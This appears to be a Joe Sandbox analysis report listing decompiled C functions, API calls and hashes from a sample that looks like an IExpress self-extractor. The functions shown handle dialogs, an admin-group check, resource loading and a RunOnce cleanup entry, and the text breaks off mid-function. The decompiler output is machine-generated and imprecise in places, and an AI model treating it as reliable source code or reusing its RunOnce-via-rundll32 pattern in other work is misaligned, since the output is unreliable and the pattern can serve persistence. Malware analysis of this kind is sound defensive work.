                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 3027380567-3029760535
                                                                                                                                                                                                      • Opcode ID: 522a9f56be2d71bcac67cc9ea8f6f73d941cceb62d1b7c206cee63c1478ecb08
                                                                                                                                                                                                      • Instruction ID: 23a2a9a291f69125aa33043616e20eee8e905ca94ad239d3f843e39d79e539f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 522a9f56be2d71bcac67cc9ea8f6f73d941cceb62d1b7c206cee63c1478ecb08
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7731C871A002986FDB619B62DC89FEA777CEB15740F0401E9B50DBA051DA756F88CF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E000E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xe8590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xe8590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E000E43D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xe8d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xe88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E000E30C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x000e3108
                                                                                                                                                                                                      0x000e310b
                                                                                                                                                                                                      0x000e31b7
                                                                                                                                                                                                      0x000e31ca
                                                                                                                                                                                                      0x000e31d0
                                                                                                                                                                                                      0x000e31d0
                                                                                                                                                                                                      0x000e31da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e31da
                                                                                                                                                                                                      0x000e3111
                                                                                                                                                                                                      0x000e3114
                                                                                                                                                                                                      0x000e3136
                                                                                                                                                                                                      0x000e3136
                                                                                                                                                                                                      0x000e3138
                                                                                                                                                                                                      0x000e313b
                                                                                                                                                                                                      0x000e3141
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3143
                                                                                                                                                                                                      0x000e3116
                                                                                                                                                                                                      0x000e311b
                                                                                                                                                                                                      0x000e314b
                                                                                                                                                                                                      0x000e3151
                                                                                                                                                                                                      0x000e3158
                                                                                                                                                                                                      0x000e316a
                                                                                                                                                                                                      0x000e3176
                                                                                                                                                                                                      0x000e317d
                                                                                                                                                                                                      0x000e318b
                                                                                                                                                                                                      0x000e319e
                                                                                                                                                                                                      0x000e31a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e31ad
                                                                                                                                                                                                      0x000e3120
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e312a
                                                                                                                                                                                                      0x000e3134
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3134
                                                                                                                                                                                                      0x000e312c
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 000E313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 000E316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E3176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 000E317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 000E3185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 000E3190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,000E30C0), ref: 000E31A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000E31CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: 03709a0320ed9502f6b402c20557ef58390ebf147c6feb551dd57f28547e117a
                                                                                                                                                                                                      • Instruction ID: cbe5cd12f4d0c3470e976697412bda3190702c6ce5b145da4b0b2e536eec326f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03709a0320ed9502f6b402c20557ef58390ebf147c6feb551dd57f28547e117a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE11E4313042D1BFEB205F259C4CB5A3EA4EB4BB21F014658F925BA1E0DB78A741C742
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E000E18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xe8128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E000E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E000E17EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xe8128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe8128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e18a3
                                                                                                                                                                                                      0x000e18a3
                                                                                                                                                                                                      0x000e18ab
                                                                                                                                                                                                      0x000e18b2
                                                                                                                                                                                                      0x000e18b5
                                                                                                                                                                                                      0x000e18be
                                                                                                                                                                                                      0x000e18c0
                                                                                                                                                                                                      0x000e18c6
                                                                                                                                                                                                      0x000e18c7
                                                                                                                                                                                                      0x000e18ca
                                                                                                                                                                                                      0x000e18cf
                                                                                                                                                                                                      0x000e19c9
                                                                                                                                                                                                      0x000e19d8
                                                                                                                                                                                                      0x000e19d8
                                                                                                                                                                                                      0x000e18df
                                                                                                                                                                                                      0x000e19b8
                                                                                                                                                                                                      0x000e19bd
                                                                                                                                                                                                      0x000e19bf
                                                                                                                                                                                                      0x000e19bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e19bd
                                                                                                                                                                                                      0x000e18fa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1912
                                                                                                                                                                                                      0x000e19aa
                                                                                                                                                                                                      0x000e19ad
                                                                                                                                                                                                      0x000e19b3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1927
                                                                                                                                                                                                      0x000e1927
                                                                                                                                                                                                      0x000e1932
                                                                                                                                                                                                      0x000e1936
                                                                                                                                                                                                      0x000e19a9
                                                                                                                                                                                                      0x000e19a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e19a9
                                                                                                                                                                                                      0x000e194c
                                                                                                                                                                                                      0x000e19a2
                                                                                                                                                                                                      0x000e19a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e196e
                                                                                                                                                                                                      0x000e1970
                                                                                                                                                                                                      0x000e1999
                                                                                                                                                                                                      0x000e199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e199c
                                                                                                                                                                                                      0x000e1972
                                                                                                                                                                                                      0x000e1972
                                                                                                                                                                                                      0x000e1975
                                                                                                                                                                                                      0x000e1984
                                                                                                                                                                                                      0x000e1985
                                                                                                                                                                                                      0x000e198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e198c
                                                                                                                                                                                                      0x000e1991
                                                                                                                                                                                                      0x000e1996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1996
                                                                                                                                                                                                      0x000e194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000E18DD), ref: 000E181A
                                                                                                                                                                                                        • Part of subcall function 000E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000E182C
                                                                                                                                                                                                        • Part of subcall function 000E17EE: AllocateAndInitializeSid.ADVAPI32(000E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000E18DD), ref: 000E1855
                                                                                                                                                                                                        • Part of subcall function 000E17EE: FreeSid.ADVAPI32(?,?,?,?,000E18DD), ref: 000E1883
                                                                                                                                                                                                        • Part of subcall function 000E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,000E18DD), ref: 000E188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000E18EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000E18F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 000E190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000E1918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 000E192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000E1944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000E1964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 000E197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 000E199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E19A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E19AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: 378c83bd835b3fc03a8d6b48a8364a2e07d4b310c1af2f92eeb9dbfc33c3fae9
                                                                                                                                                                                                      • Instruction ID: 43448f48ed2cfb857c00b2b216f7d9419cc718385e7bd9c96e85a94d7afe375d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 378c83bd835b3fc03a8d6b48a8364a2e07d4b310c1af2f92eeb9dbfc33c3fae9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B316D71A00289AFEB609FA6DC88AFFBBBCFF49B10F104429E545F6161D7349905CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x000e4699
                                                                                                                                                                                                      0x000e469b
                                                                                                                                                                                                      0x000e46a9
                                                                                                                                                                                                      0x000e46af
                                                                                                                                                                                                      0x000e46b4
                                                                                                                                                                                                      0x000e46bc
                                                                                                                                                                                                      0x000e46f9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e46f9
                                                                                                                                                                                                      0x000e46d9
                                                                                                                                                                                                      0x000e46dd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e46e5
                                                                                                                                                                                                      0x000e46ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e46f5
                                                                                                                                                                                                      0x000e46ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: dd81736bac8592e86a4c7f54c8570518c3994deecb16ab2413661d980ff7799f
                                                                                                                                                                                                      • Instruction ID: c3579f994210c5a3fee3d2bc05d28e4f3321df3adcf63007898a3deea0c0f234
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd81736bac8592e86a4c7f54c8570518c3994deecb16ab2413661d980ff7799f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA01D1363402807FF3201BA66C8CF2B7E6CDBCFF62F054014FA49BA190C9A5984482B3
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E000E17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xea288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x000e17f6
                                                                                                                                                                                                      0x000e17fd
                                                                                                                                                                                                      0x000e1805
                                                                                                                                                                                                      0x000e180b
                                                                                                                                                                                                      0x000e180d
                                                                                                                                                                                                      0x000e1815
                                                                                                                                                                                                      0x000e1818
                                                                                                                                                                                                      0x000e1820
                                                                                                                                                                                                      0x000e1824
                                                                                                                                                                                                      0x000e182c
                                                                                                                                                                                                      0x000e1832
                                                                                                                                                                                                      0x000e1837
                                                                                                                                                                                                      0x000e1851
                                                                                                                                                                                                      0x000e1854
                                                                                                                                                                                                      0x000e185d
                                                                                                                                                                                                      0x000e1862
                                                                                                                                                                                                      0x000e186c
                                                                                                                                                                                                      0x000e1872
                                                                                                                                                                                                      0x000e1877
                                                                                                                                                                                                      0x000e187e
                                                                                                                                                                                                      0x000e187e
                                                                                                                                                                                                      0x000e1883
                                                                                                                                                                                                      0x000e1883
                                                                                                                                                                                                      0x000e185d
                                                                                                                                                                                                      0x000e188a
                                                                                                                                                                                                      0x000e188a
                                                                                                                                                                                                      0x000e18a2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000E18DD), ref: 000E181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000E182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(000E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000E18DD), ref: 000E1855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,000E18DD), ref: 000E1883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000E18DD), ref: 000E188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: 9e0c297ec7ecae1d0d3d82f3e45866ae154c06005dadb43dff76fd200a66cfa0
                                                                                                                                                                                                      • Instruction ID: 7d8ff830111d2e9da880fbbeb8cc3f9bbbce90f95a54fbc6c59c64c2795813ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e0c297ec7ecae1d0d3d82f3e45866ae154c06005dadb43dff76fd200a66cfa0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E119631F00249AFEB149FA5DC89ABEBBB8EF49710F500169FA05F6290DA359D00C791
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
